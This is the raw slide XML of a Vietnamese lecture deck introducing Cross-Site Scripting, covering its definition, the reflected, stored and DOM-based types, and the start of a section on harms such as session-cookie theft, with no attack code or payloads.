            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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2A7EC503-32B8-8A6D-D1D2-83EE5B0A4F9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43</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAA00B6-83E0-2CDD-C9A2-CFDA66207E94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="2890302"/>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Định nghĩa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Lỗ hổng cho phép kẻ tấn công chèn các đoạn mã độc hại (thường là JavaScript/HTML) vào các trang web hợp pháp.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3509099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8C18D-1692-A571-932B-3750F104796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490EBA-BA81-6536-85D4-EA9B6EC13EF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BABFDFD2-7E8C-92B5-0222-3BCAE4174790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="3890809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Giới</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cross-Site Scripting (XSS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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D1118977-4F9A-C45A-9142-34B56F164C1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44</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63B74889-69FA-06EC-607D-A0E366640D74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1725256"/>
            <a:ext cx="8915400" cy="297773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Mã này được thực thi trên trình duyệt của người dùng cuối. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Mục tiêu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>là người dùng cuối, nhằm đánh cắp thông tin nhạy cảm của họ.</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Phát sinh do ứng dụng web tin tưởng và hiển thị lại dữ liệu đầu vào của người dùng mà không lọc cẩn thận (ví dụ: ô tìm kiếm, form bình luận).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3306255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205EB-4275-A2D3-A542-9791C3E6EB1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0B152BA-381D-D4B1-9589-4434CD1D49A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0F92089C-ADE9-805F-CE26-4B0A2B9DF755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="295478"/>
            <a:ext cx="8686800" cy="4537139"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.2. Các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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8D457780-8E77-63FE-A56C-9C7E08D6B495}"/>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45</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A24645-E335-BD8F-8F72-9C83605E80FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1714500"/>
            <a:ext cx="8915400" cy="297773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Reflected XSS (XSS Phản Chiếu):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Dạng phổ biến nhất. Mã độc được gửi qua URL, máy chủ phản chiếu lại trình duyệt và thực thi ngay lập tức.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Thường được dùng để chiếm phiên làm việc (Session Hijacking) bằng cách gửi cookie phiên đến máy chủ của hacker.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1826501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B6427-1B4C-7CC0-1F74-A47217659E8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F5C106E-4F6A-B6E9-1A09-B5FD36B084E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CEF609ED-451C-E602-A1BC-561927F38AE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="3890809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.2. Các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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F2EE9B96-B7FA-0C11-6A9C-6605F307AB6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46</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{029F66F9-785A-EEED-3D73-415D0F8963B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1004989"/>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Reflected XSS (XSS Phản Chiếu):</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="3000" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59BFB3AF-F02E-C333-5AB1-6BF273421A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1223009" y="1699564"/>
            <a:ext cx="6705600" cy="3850313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="732010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3416A-2841-5E0A-EDBA-F6F1AED1F67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54BDF2B-D865-F304-E3D7-B0C61A368DD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83802329-57C7-01F0-B9DE-D88A0E8CCF20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="3890809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.2. Các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <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9D372C77-623F-84BD-FC27-FB28CA1164D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47</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C445243-0C28-F284-03D9-580EB8744D8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1104900"/>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Stored XSS (XSS được lưu trữ):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Dạng nguy hiểm nhất. Mã độc được lưu trữ vĩnh viễn trên máy chủ (ví dụ: trong form bình luận, CSDL). Mọi người dùng truy cập trang đó đều sẽ bị ảnh hưởng.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2603891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3ECF4-1DB9-20FF-2ED0-0BA960FED3C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FB3CCAE-7274-9EC0-0D4F-A1D8EDE98C0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9A4363C2-31B4-79C3-234A-EAA9E45CBFAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="3890809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2.2.2. Các </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dạng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>điểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="vi-VN" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{620A2517-28A8-D99B-9736-112D5EE1BBE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48</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB40FDBC-4A59-6B44-D3B6-C2C22F391E08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1104900"/>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DOM-based XSS (XSS Dựa Trên DOM): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Xảy ra hoàn toàn ở phía client (trình duyệt). Lợi dụng lỗ hổng trong mã JavaScript để thay đổi Cây mô hình đối tượng tài liệu (DOM).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2383950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D8D9C-A27C-37AF-3D5C-544094583FB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1E1E2B7-0B26-0453-1C26-FE88DC5FE22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46347BF2-7603-D91E-B797-A488F10D83AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="295478"/>
            <a:ext cx="9029700" cy="1305486"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t>2.2.3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>Tác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>hại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>của</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>cuộc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
              <a:t> XSS</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" spc="-20" dirty="0"/>
            </a:br>
            <a:endParaRPr spc="-20" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DA32B8D-C087-6805-8A46-EF42F3D9B8F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49</a:t>
            </a:fld>
            <a:endParaRPr spc="-25" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76731C5B-9386-7F0F-F931-64433186B970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="114300" y="1104900"/>
            <a:ext cx="8915400" cy="3080329"/>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Đánh cắp Cookie (Session Hijacking): </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="3000" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
